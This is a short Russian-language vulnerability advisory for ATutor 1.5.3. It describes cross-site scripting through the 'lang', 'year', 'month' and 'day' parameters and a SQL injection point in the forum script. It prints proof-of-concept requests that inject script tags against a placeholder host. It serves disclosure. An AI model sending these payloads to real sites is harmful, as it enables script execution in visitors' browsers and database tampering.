• Партнер

  • Программа: ATutor 1.5.3, возможно более ранние версии.

    Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" в сценарии documentation/index_list.php, и в параметрах "year", "month" и "day" в сценарии registration.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    Пример:

    http://target.xx/documentation/index_list.php?lang="> <script>alert(/EllipsisSecurityTest/)</script>

    POST http://target.xx:80/registration.php?register=Register HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Host: target.xx
    ml=1&year="><script>alert(/EllipsisSecurityTest/)</script>

    POST http://target.xx:80/registration.php?register=Register HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Host: target.xx
    ml=1&month="><script>alert(/EllipsisSecurityTest/)</script>

    POST http://target.xx:80/registration.php?register=Register HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Host: target.xx
    ml=1&day="><script>alert(/EllipsisSecurityTest/)</script>

    http://target.xx/forum/index.php?fid=-1[SQL]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии